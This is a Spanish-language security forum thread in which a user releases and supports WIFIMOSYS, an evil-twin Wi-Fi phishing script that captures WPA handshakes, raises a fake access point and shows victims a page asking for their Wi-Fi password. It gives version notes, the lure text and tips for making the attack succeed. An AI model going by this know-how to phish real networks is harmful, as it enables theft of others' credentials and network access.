Seguridad Wireless - Wifi

Desarrollo de scripts y aplicaciones => Aplicaciones y diccionarios linux => Mensaje iniciado por: Vodker en 05-08-2016, 13:46 (Viernes)



Título: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 05-08-2016, 13:46 (Viernes)
Saludos!

Desde que apareció LINSET han ido sucediéndose bastantes clones más o menos afortunados. Creo haberlos probado todos y tengo la sensación de que en lugar de mejorarlo lo han complicado hasta el absurdo.
Quizá por ello hace tiempo que me hice una versión personalizada del script de vk496 que he ido toqueteando aquí y allá hasta dejarla lo más limpia posible.

Bueno, pues hoy, con la salida de Wifislax 4.12 he decidido ponerla a disposición de todos por si a alguien le puede ser útil.

¿En que consisten las mejoras?

- Ocupa menos espacio que el original (266 kb contra solo 35) y está mucho más optimizado.

- Las páginas que carga el destinatario del ataque también se reducen mucho incrementando así su velocidad. Con LINSET (y sus clones) había que enviarle a la víctima 1,5 Mb (muchos no lograban cargarla y eso malograba el ataque) y ahora apenas son 45 kb.  ;)

- Se opta por lo seguro y solo se comprueba el handshake con pyrit, con lo que la posibilidad de error es prácticamente nula.

- He quitado idiomas y demás zarandajas innecesarias para nosotros. El código es libre, quien desee incluir su idioma, ya sabe, manos a la obra.

- Menús reducidos y mucho más claros. Ya no hay que hacer tantas selecciones.

- Los handshakes se guardan con su ESSID para su mejor acceso en posteriores ataques.

- No hay ninguna página que simule marcas de routers. Ese era el deseo de vk496 y siempre lo he respetado. Además, no son necesarias.

- Se puede ver en tiempo real una lista de las contraseñas erróneas introducidas (ideal para comprobar su funcionamiento).

- Está optimizado para Wifislax. Colocar el script en la carpeta /usr/bin/ y ejecutar desde consola ( wifimosys )

También hay cosas menos buenas como que no carga páginas HTTPS (ni wifimosys ni ninguno), pero llevo unos días haciendo pruebas con modificaciones del script sobre Apache en lugar de Lighttpd con resultados alentadores.  ;)

No me enrollo más, quien quiera probarlo lo tiene en https://github.com/Vodker/wifimosys (https://github.com/Vodker/wifimosys), ahí también está como módulo para Wifislax, con su ridículo nombre y su ridículo peso (12 kb)  ;D

Saludos de nuevo y gracias a todos.


ACTUALIZACIÓN 04-05-2017: Subida versión 0.22
- Modificado método de deatuth, ahora con wifijammer
- Ahora se obtiene el handshake más fácilmente siendo el método de comprobación más permisivo

ACTUALIZACIÓN 21-12-2016: Subida versión 0.21
- Se elimina el chequeo de dependencias. Está más que probado que todas están en Wifislax. El que quiera poner el script en otro sistema, allá él.
- Corregido un molesto bug por el que en ocasiones salía un mensaje por pantalla.
- Ahora si usamos una sola tarjeta wireless ya no hace falta seleccionarla, la autodetecta y la pone en modo monitor.
- Mejor automatización del proceso de captura del handshake.
- Añadido el "Modo obstinado" en la detección del handshake ( busca hasta 5 minutos y procede a validarlo si lo encuentra antes).
- Cambio de algunos mensajes y chorradas estéticas.

ACTUALIZACIÓN 19-12-2016: Subida versión 0.20
( Ahora detecta automáticamente si se capturó el handshake y procede en consecuencia  ;D )

PREGUNTAS FRECUENTES:

- ¿Y cómo se usa esto?
Con Wifislax 4.XX colocas el script en la carpeta /usr/bin/ de Wifislax y lo ejecutas desde una terminal poniendo wifimosys, o usas el módulo y lo tendrás desde el menú (Wifislax - WPA). Si tienes y usas el nuevo Wifislax 64 ya tienes Wifimosys en el menú junto al resto de herramientas.

- No me captura el handshake o siempre está corrupto, ¿qué hago?
Dependiendo de la marca y modelo del router puede ser más o menos complicado pero siempre acaba saliendo. Wifimosys ha elegido ser muy estricto con los handshakes para que cuando se obtengan se guarden y sean válidos para cualquier otra herramienta de auditoría. La solución es volver a intentarlo hasta que te salga uno bueno. A veces cuesta. A veces no.

- Me paso esperando mucho tiempo y no se conecta nadie al falso AP ¿hago algo mal?
No, no haces nada mal, pero eso no está en mis manos ni en las tuyas. Depende del que se tiene que conectar, así que paciencia y si te hartas de esperar prueba en otro momento.

- Vale, he sido paciente y ya veo conexiones. Pero ahora no me da el password ¿Esto funciona de verdad?
Claro que funciona (compruébalo tú en tu red) pero depende de factores que no controlamos. Ya sabes que no funciona con páginas HTTPS, así que si tu víctima solo conecta a Gmail, Facebook, Twitter, etc. pues no tendrás ningún resultado ya que ni él mismo podrá ver tu página fake. Habrás de esperar.

- Te hice caso y ya tengo contraseñas. ¡Gracias!
Enhorabuena, pero ahora lo correcto sería avisar a esa persona que ha "picado" tu anzuelo de lo vulnerable que resulta su red wifi si actúa de esa manera y va regalando sus contraseñas por ahí. Cualquier otra acción en la que te aproveches de tener esa contraseña está mal y puede que sea delito. Pero bueno, tú mismo. Desde luego yo no te recomiendo otra cosa más que lo que te dicho antes: contactar y poner sobre aviso al usuario de su debilidad. Hacer auditorías es divertido, quebrantar la ley solo trae problemas.

- ¿Próximamente se actualizará con soporte a páginas HTTPS?
En eso estoy trabajando entre otras mejoras. Échale un ojo de vez en cuando a estas páginas por si acaso.

- ¿Me das algún consejillo para tener éxito con esto?
Has de estar cercano y tener muy buena señal del AP que atacas, prueba en los momentos en que hay más tráfico en la red (#datas) y no olvides que esto es auditoría y diversión. Ahí radica el éxito.

NOTA: NO contestaré a mensajes privados sobre el script. Esto es un foro y cuanto más compartamos todos, mejor funcionará.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: kley en 05-08-2016, 16:36 (Viernes)
 ;) ;)Buenas tardes,
Enhorabuena vodker, wifimosys lo acabo de probar en mi rooter y corre incluso mejor que el autentico linset, me ha sorprendido gracias por compartirlo.
A cuidarse, un saludo.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: drvalium en 05-08-2016, 16:57 (Viernes)
habrá que probarlo.

gracias por compartirlo ;)


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: skinoi25 en 05-08-2016, 23:13 (Viernes)
gracias por compartir amigo
lo probare y te cuento como me fueee
graciass


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: dynyly en 06-08-2016, 02:51 (S?bado)
salu2
esta bien que uno quiera aprender y enrede
pero solo veo codigo de fluxion ;y de colores  y quizas alguno mas como la version de musket
faltan cositas .....al codigo
no digo que este bien aprender y compartir
por favor comenta de donde sacas ideas o codigo para asi mejorarlo al maximo
pero comenta por favor ....
-------
dices que apache te resulta bien por favor comparte mas datos de cocina sobre apache eso me interesa
yo he llegado a conclusion de que lighttpd algo raro hay ahi porque estoy cansado de prubas con iptables y lighttpd pero nada sin embargo en la wifislax4.9 responde bien


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: drvalium en 06-08-2016, 20:04 (S?bado)
me estaba mirando el nombre y ciertamente es de muy mal gusto, supongo que Fimosis en ingles quiere decir otra cosa jajajaja


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 06-08-2016, 20:09 (S?bado)
me estaba mirando el nombre y ciertamente es de muy mal gusto, supongo que Fimosis en ingles quiere decir otra cosa jajajaja

En realidad, hace muchos meses, lo llamé WIFI MONGOLO'S SYSTEM (por aquello de que hay que ser muy mongolo para meter tu password sin comprobar quien te lo pide). Aquello fue la risión cuando lo probaba con mis amigos (que resultaron ser mongolos todos)  ;D


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: drvalium en 06-08-2016, 20:49 (S?bado)
a ver si lo pruebo y lo meto en la versión de Wifislax para VMware


Título: Re:
Publicado por: Markillo3121 en 07-08-2016, 11:42 (Domingo)
Gracias por compartir Vodker


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 10-08-2016, 00:30 (Mi?rcoles)
Subida una nueva versión con algunas mejoras ;)


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: WiFlash en 19-08-2016, 21:09 (Viernes)
¡Genial utilidad! Habrá que probarla! Saludos!


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 26-10-2016, 16:21 (Mi?rcoles)
Subida una nueva versión (0.15) que corrige algunas cosillas, ya no hace falta regresar por menús para cambiar opciones y muestra una lista de los passwords erróneos que pueda introducir la víctima (ideal para hacer pruebas con nuestros dispositivos para ver el funcionamiento).

Gracias a los que la habéis probado.

EDITO (31 OCT 2016): Nueva versión (0.16) con código más claro, un poco más estética y aún más ligera ;)


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: WiFlash en 27-10-2016, 22:41 (Jueves)
¡Gracias, saludos!   >:(


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: samoray en 07-11-2016, 14:07 (Lunes)
Dear Members,
I dont know if this problem has been reported but, when I launch "wifimosys" everything works fine but ther is "no fake AP" created. does anyoe knows about the problem?
Google translator:
"Queridos miembros,
No sé si este problema se ha informado, pero cuando lanzo "wifimosys" todo funciona bien, pero ther es "no falso AP" creado. ¿Alguien sabe sobre el problema?"


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 07-11-2016, 18:30 (Lunes)
No users has reported errors creating Fake AP's. Do you use Wifislax 4.12?

Ningún user ha informado de errores creando el AP falso. ¿Usas Wifislax 4.12?

(http://fotos.subefotos.com/bc0646b432e61877d76ef302a6a06abeo.jpg)


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: user02 en 08-11-2016, 13:21 (Martes)
Dear Members,
I dont know if this problem has been reported but, when I launch "wifimosys" everything works fine but ther is "no fake AP" created. does anyoe knows about the problem?
Google translator:
"Queridos miembros,
No sé si este problema se ha informado, pero cuando lanzo "wifimosys" todo funciona bien, pero ther es "no falso AP" creado. ¿Alguien sabe sobre el problema?"

He tenido el mismo problema, y creo que es culpa de la alfa AWUS036H. Con la AWUS052NH Y AWUS036NHA ha funcionado correctamente.

Google translator:
I've had the same problem, and I think it's Alpha AWUS036H's fault. With the AWUS052NH and AWUS036NHA has worked correctly.

pd: gracias por tu trabajo y compartirlo :D


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: sanson en 08-11-2016, 13:44 (Martes)
hola

Citar
He tenido el mismo problema, y creo que es culpa de la alfa AWUS036H

el chip RTL8187L no es valido parar crear Fake AP

saludos


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 08-11-2016, 14:14 (Martes)
Lo del chip RTL8187L era un problema ya conocido. De hecho, creo recordar que era hostapd el que no funcionaba correctamente con ese chip (sí lo hacía airbase-ng en cambio).

Intentaré hacer pruebas con airbase como alternativa si se detecta ese modelo de chipset (pero es un coñazo, hostapd es mucho más potente).

Gracias !


EDITO: Ya no dispongo del modelo AWUS036H. ¿Alguien con chip 8187L sería tan amable de probar esta versión con su tarjeta?

https://mega.nz/#!h1pRQQ5Y!KuArdRvOs2wx1rZZdnFLAk4616g7t4zsMEZ2JSB_e-c (https://mega.nz/#!h1pRQQ5Y!KuArdRvOs2wx1rZZdnFLAk4616g7t4zsMEZ2JSB_e-c)

Gracias de antemano.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: drvalium en 09-11-2016, 00:27 (Mi?rcoles)
hi

te confirmo que funciona bien usando un rtl8187L, crea el fakeAP y al entrar en el navegador te encuentras la web para meter la contraseña.

Pero, solo me ha funcionado usando Chrome en la victima y no se, si por fallo del script o por que no se donde mirarlo, he sido incapaz de ver en Wifislax la contraseña de la victima y la victima (yo) he metido la clave varias veces para intentar concectarme.

en general funciona fino ;)


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 09-11-2016, 00:39 (Mi?rcoles)
Muchas gracias, añadí unas líneas para la compatibilidad con 8187L y airbase solo para ver si funcionaba, ahora sabiendo que funca intentaré hacerle unos arreglos al script para dejarlo lo más afinado que sepa, que yo no tengo ni idea de bash pero algo voy aprendiendo  ;)

Mil gracias dr.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: drvalium en 09-11-2016, 01:06 (Mi?rcoles)
Nada que agradecer ;)





Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: kley en 09-11-2016, 08:19 (Mi?rcoles)
la herrramienta funciona bien es ligera, estable e hila fino.
bajo mi humilde opinion no deveria faltar en las herramientas de ingeneria social de wifislax, gracias vodker por tu trabajo y por compartirlo.
un saludo >:( >:(


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 15-11-2016, 05:23 (Martes)
Jo, que casi se me pasa... quiero agradecer públicamente a USUARIONUEVO haber incluido wifimosys en la versión x64 de Wifislax, al menos en las versiones de desarrollo, ojalá en la final   ^-^ ;)
Un placer haber podido colaborar en algo, aunque sea poquita cosa.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: samoray en 15-11-2016, 11:04 (Martes)
thank you for your help, I will try it and report back
'''Gracias por tu ayuda, lo intentaré y volveré a informar'''


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: WiFlash en 15-11-2016, 15:58 (Martes)
Jo, que casi se me pasa... quiero agradecer públicamente a USUARIONUEVO haber incluido wifimosys en la versión x64 de Wifislax, al menos en las versiones de desarrollo, ojalá en la final   ^-^ ;)
Un placer haber podido colaborar en algo, aunque sea poquita cosa.

Ya era hora =D


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: sol666 en 15-11-2016, 20:46 (Martes)
lo he probado y funciona perfecto,lo unico que hecho en falta es despues de escanear alguna opcion para salir y que al salir levante el networkmanager,por lo demas un 10  ;)


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 15-11-2016, 23:37 (Martes)
sol666 ya está en la versión 0.18 (en desarrollo, pero válida).
Si quieres puedes probarla: https://github.com/Vodker/wifimosys (https://github.com/Vodker/wifimosys)

Saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: sol666 en 16-11-2016, 19:54 (Mi?rcoles)
la probare,has puesto algo de lo que he dicho?por lo menos lo de salir si despues de escanear no conviene atacar e iniciar el servicio networkmanager.
Me callo,ya veo que lo has añadido  ;) ;),probada y todo ok,si no vas a añadir nada mas en la 18 que la ponga usuarionuevo en la de desarrollo .


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 17-11-2016, 19:33 (Jueves)

probada y todo ok


Pues nada, la doy por buena y la subo.
No creo que vaya a hacer más cambios menores, supongo que la próxima versión contará ya con algo importante ;)


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: WiFlash en 20-11-2016, 01:49 (Domingo)
Ya era hora de tenerla presente en Wifislax  ;D

Saludos!!


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: SherlockH en 06-12-2016, 07:13 (Martes)
Vodker sos un genio!! Estaba buscando una actualización a esta fantástica herramienta desde hace meses :)

Te felicito por el trabajo logrado, espero continúes desarrollando... Veo que este thread no tiene muchos comentarios, después se quejan de que los proyectos no continúan, vamos! Que escribir un par de líneas no cuesta nada.

Se ve que el script está mucho más pulido así que no tengo más que agradecimiento de mi parte  >:(

Dicho esto, tengo una pequeña consulta: intenté realizar una prueba en casa y el celular en Android se me quedó en "Obteniendo dirección IP" por lo que la conexión con el Fake AP nunca se realizó... ¿Alguna idea?

Saludos y nuevamente muchas gracias por compartir :D


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: kley en 06-12-2016, 08:44 (Martes)
Dicho esto, tengo una pequeña consulta: intenté realizar una prueba en casa y el celular en Android se me quedó en "Obteniendo dirección IP" por lo que la conexión con el Fake AP nunca se realizó... ¿Alguna idea?

En mi caso cuando wifimoys crea el ap falso, directamente me desconecta el android y me lo conecta al ap falso y me sale un mensaje en el android (mi movil)  el cual dice: abre tu navegador para la conexion.......
Abro navegador y directamente me lleva al index metes pas y voala!
Es una pasada lo bien k trabaja, si es cierto que en alguna prueba tambien algo me ha fallado, por lo que sea, pero 99% efectivo. Recomiendo reiniciar o hacer el ataque sin haber hecho otros antes.
Nuevamente gracias al creador. ah, me alegro un monton de verla en la version x64, espero se quede para siempre merece la pena....
Saludos


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: jfuentes102 en 11-12-2016, 03:34 (Domingo)
Que tal brothers...
Una de las cosas que me gusta de este script es que usa lenguaje netamente latino, y por ende es mas facil que la victima "muerda el anzuelo" por asi decirlo. "OJO" lo digo solo para los que vivimos en latinoamerica.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 11-12-2016, 11:25 (Domingo)
"Se ha perdido la conexión.
Por razones de seguridad es necesario validarse para acceder a Internet.
Introduzca su contraseña Wifi"

¿Lenguaje netamente latino? Bueno, es una forma de verlo  ;D ;D ;D


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: jfuentes102 en 14-12-2016, 04:56 (Mi?rcoles)
claro porque en otros scrips se complican mucho en el vocabulario a la hora de pedir ingresar la clave wifi, y creo que lo hace un poco mas complicado para el usuario final de enteder que se le está pidiendo hacer.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: SherlockH en 16-12-2016, 05:15 (Viernes)
¿Parece entonces que el AP falso no corre en Wifislax 4.12? ¿Qué versión recomiendan instalar?


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 16-12-2016, 11:54 (Viernes)
¿Parece entonces que el AP falso no corre en Wifislax 4.12? ¿Qué versión recomiendan instalar?

El AP falso funciona perfectamente en la 4.12 y en el nuevo Wifislax64.



Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 18-12-2016, 19:15 (Domingo)
Subida nueva versión 0.20.

Ahora el script detecta automáticamente tras unos segundos si se capturó el handshake y procede a validarlo para continuar el ataque.
Hace tiempo que quería hacer esta modificación. Ha costado algunas horas pelear con bucles y procesos en segundo plano, pero ahí está.
No hay nada imposible para alguien que no tiene ni repajolera idea de programación pero se pone cabezota  ;D ;D ;D

Saludos y buena caza.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: USUARIONUEVO en 18-12-2016, 21:24 (Domingo)
GRACIAS , voy a actualizar el de la iso.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 18-12-2016, 23:39 (Domingo)
A lo mejor sería prudente dejar que se pruebe antes por algunos usuarios. La verdad es que es solo una actualización "para que sea más cómodo" pero no añade nada nuevo. Y el hecho de que a mi me funcione en mi sistema no significa que funcione en todos (que ya ocurrió antes).
No sé, es una idea. Tampoco es que vaya a explotar nada si algo falla en el script  ;D

Gracias y aprovecho para felicitarte por el gran curro de la versión 64.


EDIT: Ya sabía yo que algo se me iba a colar.... justo en la línea 590  ^-^


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 21-12-2016, 08:05 (Mi?rcoles)
Bueno, pues aprovecho que tengo vacaciones y subo otra versión, la 0.21

- Se elimina el chequeo de dependencias. Está más que probado que todas están en Wifislax. El que quiera poner el script en otro sistema, allá él.
- Corregido un molesto bug por el que en ocasiones salía un mensaje por pantalla.
- Ahora si usamos una sola tarjeta wireless ya no hace falta seleccionarla, la autodetecta y la pone en modo monitor.
- Mejor automatización del proceso de captura del handshake.
- Añadido el "Modo obstinado" en la detección del handshake ( busca hasta 5 minutos y procede a validarlo si lo encuentra antes).
- Cambio de algunos mensajes y chorradas estéticas.

Saludos, feliz Navidad y buena caza !


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: alonsote en 21-12-2016, 13:40 (Mi?rcoles)
Gracias Vodker, muy currado.

Feliz Navidad.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: USUARIONUEVO en 21-12-2016, 21:02 (Mi?rcoles)
Yo no habria quitado el chequeo de dependencias ..

Aunque estan todas puedes eliminar un paquete sin saber que te hara falta para este script.



Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 22-12-2016, 06:17 (Jueves)
Yo no habria quitado el chequeo de dependencias ..

Aunque estan todas puedes eliminar un paquete sin saber que te hara falta para este script.



Ya pensé en eso, pero llegué a la conclusión de que es algo absurdo.
Se usan las dependencias de la suite aircrack más awk, curl, dhcpd, hostapd, iwconfig, lighttpd, macchanger, mdk3, openssl, pyrit, python, xterm y PHP5, que son comunes a una buena parte de las aplicaciones de Wifislax. Si alguien elimina uno de estos paquetes se quedaría sin un tercio del sistema (al menos en lo que se refiere a la auditoría).
Es una decisión que se puede rectificar, por supuesto, pero es que de verdad me parece absurdo que alguien elija tener un sistema como Wifislax sin alguno de estos paquetes.

Saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: kley en 22-12-2016, 13:17 (Jueves)
muy buena la 0.21 esta bien tener una segunda opcion de conseguir el handshake pues en 15 segundos hacia corto. Como siempre buen trabajo, un saludo


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 30-12-2016, 12:13 (Viernes)
He detectado algunos fallitos. No afectan a la ejecución del script, son algo "interno" y estarán corregidos en la próxima versión, pero como no son relevantes esperaré a sacarla cuando incluya alguna característica nueva ;)

Salu2 y mil gracias a todos los que lo habéis probado.  ¡¡¡ Feliz 2017 !!!


Título: Una maravilla
Publicado por: raiden2020 en 13-01-2017, 21:14 (Viernes)
Hola Vodker!
Primeramente quiero felicitarte por el módulo que has creado para Wifislax.
Es excelente, funciona muy bien, súper liviano y con toda la información necesaria para auditar redes.
Ojalá pronto puedas modificar el script para que la página "fake" aparezca también en las webs "https".
Sería genial !  >:(
Muchas gracias por el excelente trabajo que realizas y por compartirlo con nosotros.
Feliz 2017 para tí y para todos los miembros del foro!
Saludos!   ;)


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: orion999 en 14-01-2017, 03:43 (S?bado)

Le ponemos una chincheta para que no se extravíe.

Gracias por el trabajo.

Saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: zaratustra en 19-01-2017, 19:10 (Jueves)
Hola buenas,

de primeras agradecer al compañero el excelente trabajo que se ha metido. Queria comentar, que parece que con wifimosys me cuesta mas obtener el handshake, con linset lo obtenia bastante rapido y sin embargo con este , de 15 pruebas que he realizado, solo me lo ha obtenido en una , usando tanto el modo normal como el obstinado, ¿sabeis que puede ocurrir?

gracias


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 19-01-2017, 20:08 (Jueves)
con wifimosys me cuesta mas obtener el handshake, con linset lo obtenia bastante rapido y sin embargo con este , de 15 pruebas que he realizado, solo me lo ha obtenido en una , usando tanto el modo normal como el obstinado, ¿sabeis que puede ocurrir

Te comento: Wifimosys usa pyrit para testear el handshake. Linset lo podía hacer con aircrack, mucho más permisivo y que permitía continuar con handshakes incompletos. El caso es que Wifimosys guarda el handshake en una carpeta para posibles usos con otras aplicaciones, con lo cual decidí que pasase el chequeo más "estricto" y que así fuese válido para cualquier uso posterior con cualquier otro programa.

En resumen, cuesta un poco más obtenerlo pero cuando lo tienes es mucho más útil que el simple chequeado por aircrack ya que te puedes usarlo con todas las garantías para, por ejemplo, pasarle un diccionario a fuerza bruta.

Saludos !!


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: zaratustra en 20-01-2017, 19:17 (Viernes)
con wifimosys me cuesta mas obtener el handshake, con linset lo obtenia bastante rapido y sin embargo con este , de 15 pruebas que he realizado, solo me lo ha obtenido en una , usando tanto el modo normal como el obstinado, ¿sabeis que puede ocurrir

Te comento: Wifimosys usa pyrit para testear el handshake. Linset lo podía hacer con aircrack, mucho más permisivo y que permitía continuar con handshakes incompletos. El caso es que Wifimosys guarda el handshake en una carpeta para posibles usos con otras aplicaciones, con lo cual decidí que pasase el chequeo más "estricto" y que así fuese válido para cualquier uso posterior con cualquier otro programa.

En resumen, cuesta un poco más obtenerlo pero cuando lo tienes es mucho más útil que el simple chequeado por aircrack ya que te puedes usarlo con todas las garantías para, por ejemplo, pasarle un diccionario a fuerza bruta.

Saludos !!

Si es así, chapeau! Para trabajar con handshakes que puedan que sean erróneos mejor de esta forma, mil gracias de nuevo!


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: omarcity en 28-01-2017, 16:21 (S?bado)
Disculpen la ignorancia pero la versión mejorada de linset (FLUXION) en que se diferencia.? corre mejor o acaso el index trae menos errores?
 


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 28-01-2017, 17:12 (S?bado)
Disculpen la ignorancia pero la versión mejorada de linset (FLUXION) en que se diferencia.? corre mejor o acaso el index trae menos errores?
 

No entiendo estas preguntas cuando está al alcance de todos probarlo por uno mismo...


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: kumurikage en 28-01-2017, 21:16 (S?bado)
tengo una duda por que con linset fluxion y este programa en wifislax no puedo crear ap fake en el canal 13 es problema de mi tarjeta?


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 31-01-2017, 13:32 (Martes)
tengo una duda por que con linset fluxion y este programa en wifislax no puedo crear ap fake en el canal 13 es problema de mi tarjeta?

Lo acabo de probar y no he tenido ningún problema en atacar una red en el canal 13.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: hugo1 en 01-02-2017, 22:56 (Mi?rcoles)
se soluciono el problema referido al cambio de canal del router?


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: kumurikage en 06-02-2017, 17:57 (Lunes)
tengo una duda por que con linset fluxion y este programa en wifislax no puedo crear ap fake en el canal 13 es problema de mi tarjeta?

Lo acabo de probar y no he tenido ningún problema en atacar una red en el canal 13.

sera problema de driver de mi tarjeta mini pci ar 9485 ????????????

que tarjeta tienes?


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 06-02-2017, 18:12 (Lunes)
Creo recordar que algunas Atheros no funcionaban con los canales 12 y 13. Pero esto me suena de hace tiempo, desconozco si se solucionó.
Saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: kumurikage en 06-02-2017, 20:40 (Lunes)
Creo recordar que algunas Atheros no funcionaban con los canales 12 y 13. Pero esto me suena de hace tiempo, desconozco si se solucionó.
Saludos.

yo lei sobre modificar las eemproms pero esas ni leian en canal 13

en cambio esta la lee pero no hace el ap

sabes como modificar la eemprom con wifislax?

sera problema de driver de wifislax?


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: EltitoLitos en 07-02-2017, 14:19 (Martes)
Yo uso wifislas boteeado soy novato... en este apartado pone wifislax linux , me valdria? inicio wifislax desde bios y wifislax ya es linux.... por lo tanto no entiendo nada................................ ??? por que hacen dos apartados? por ultimo alguien me envia un video de como instalar este programa en wifislax si no me busco la vida....tambien tengo una duda en mi wifislax tengo el problema de que muchas veces le doy a guardar algo y cuando apago el pc se borra..............


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: EltitoLitos en 07-02-2017, 14:22 (Martes)
Por ultimo vodker......... admiro tu trabajo ojala pudiera hacerlo yo como hobbie es muy util y seguro que tienes muchos proyectos particulares y no publicos que son una pasada! Enhorabuena vodker sientete afortunado ! lo que haces tiene mucho merito.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: sanson en 07-02-2017, 14:32 (Martes)
Yo uso wifislas boteeado soy novato... en este apartado pone wifislax linux , me valdria? inicio wifislax desde bios y wifislax ya es linux.... por lo tanto no entiendo nada................................ ??? por que hacen dos apartados? por ultimo alguien me envia un video de como instalar este programa en wifislax si no me busco la vida....tambien tengo una duda en mi wifislax tengo el problema de que muchas veces le doy a guardar algo y cuando apago el pc se borra..............

hola

es conveniente que leas por el foro, busques información y aprendas todo lo que puedas antes de sacar conclusiones.  Esto no es quemar un CD y ponerse a funcionar, si te gusta esto documentate.

saludos

pd, no hagas re-post


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: jfuentes102 en 07-02-2017, 23:45 (Martes)
Yo uso wifislas boteeado soy novato... en este apartado pone wifislax linux , me valdria? inicio wifislax desde bios y wifislax ya es linux.... por lo tanto no entiendo nada................................ ??? por que hacen dos apartados? por ultimo alguien me envia un video de como instalar este programa en wifislax si no me busco la vida....tambien tengo una duda en mi wifislax tengo el problema de que muchas veces le doy a guardar algo y cuando apago el pc se borra..............
viejo busca en youtube como instalar modulos en wifislax...


Título: Re:
Publicado por: pikota_mayor en 08-02-2017, 11:25 (Mi?rcoles)
Hola. En primer lugar mil gracias a toda la gente que hace posible este gran foro. Tengo unas dudas, wifimosys no me capturaba el handshake de mi red ... Así que decidí usar handshaker  y este si me consiguió el handshake de mi red. Cómo puedo poner ese handshake en wifimosys???? Tengo el handshake guardado en la carpeta handshake pero cuando lo copio en wifimosys  .... Me dice archivo no encontrado. Una ayuda porfa. Gracias


enviado desde mi s6 edge + gold 64gb



Título: Re:
Publicado por: Vodker en 08-02-2017, 13:15 (Mi?rcoles)

Tengo el handshake guardado en la carpeta handshake pero cuando lo copio en wifimosys  .... Me dice archivo no encontrado. Una ayuda porfa. Gracias


Si te dice archivo no encontrado es eso mismo: no encontrado. O sea, que la ruta que has puesto no es correcta.
Si lo tienes en la carpeta /root/handshakes en Wifimosys solo tienes que poner el nombre del mismo y la extensión (ej: wifimosys.cap).
De todas formas te aconsejo capturar el handshake con Wifimosys aunque cueste un poco más (en una de las respuestas de arriba explico porqué).

Saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: drvalium en 08-02-2017, 21:20 (Mi?rcoles)
hi

Yo uso wifislas boteeado soy novato... en este apartado pone wifislax linux , me valdria? inicio wifislax desde bios y wifislax ya es linux.... por lo tanto no entiendo nada................................ ??? por que hacen dos apartados?

Hay dos apartados por que distribuciones Linux las hay a decenas, en la sección de Wifislax solo se trata de Wifislax, para el resto de distros se usa la sección Linux.

Citar
por ultimo alguien me envia un video de como instalar este programa en wifislax si no me busco la vida....

Hay una sección solo de vídeos en este foro, miratela.

Citar
tambien tengo una duda en mi wifislax tengo el problema de que muchas veces le doy a guardar algo y cuando apago el pc se borra..............

si se inicia como LiveUSB/CD nunca se guardan los cambios, si quieres guardarlos tienes que crear un changes.dat o salvar los cambios en un modulo .zxm

saludos

pd: nada de lo que preguntas tiene que ver con este tema, intenta respetar el orden de las cosas, si no ves ningún tema que se ajuste a tu consulta abre uno nuevo, gracias.


Título: Re:
Publicado por: jorose1987 en 09-02-2017, 02:08 (Jueves)
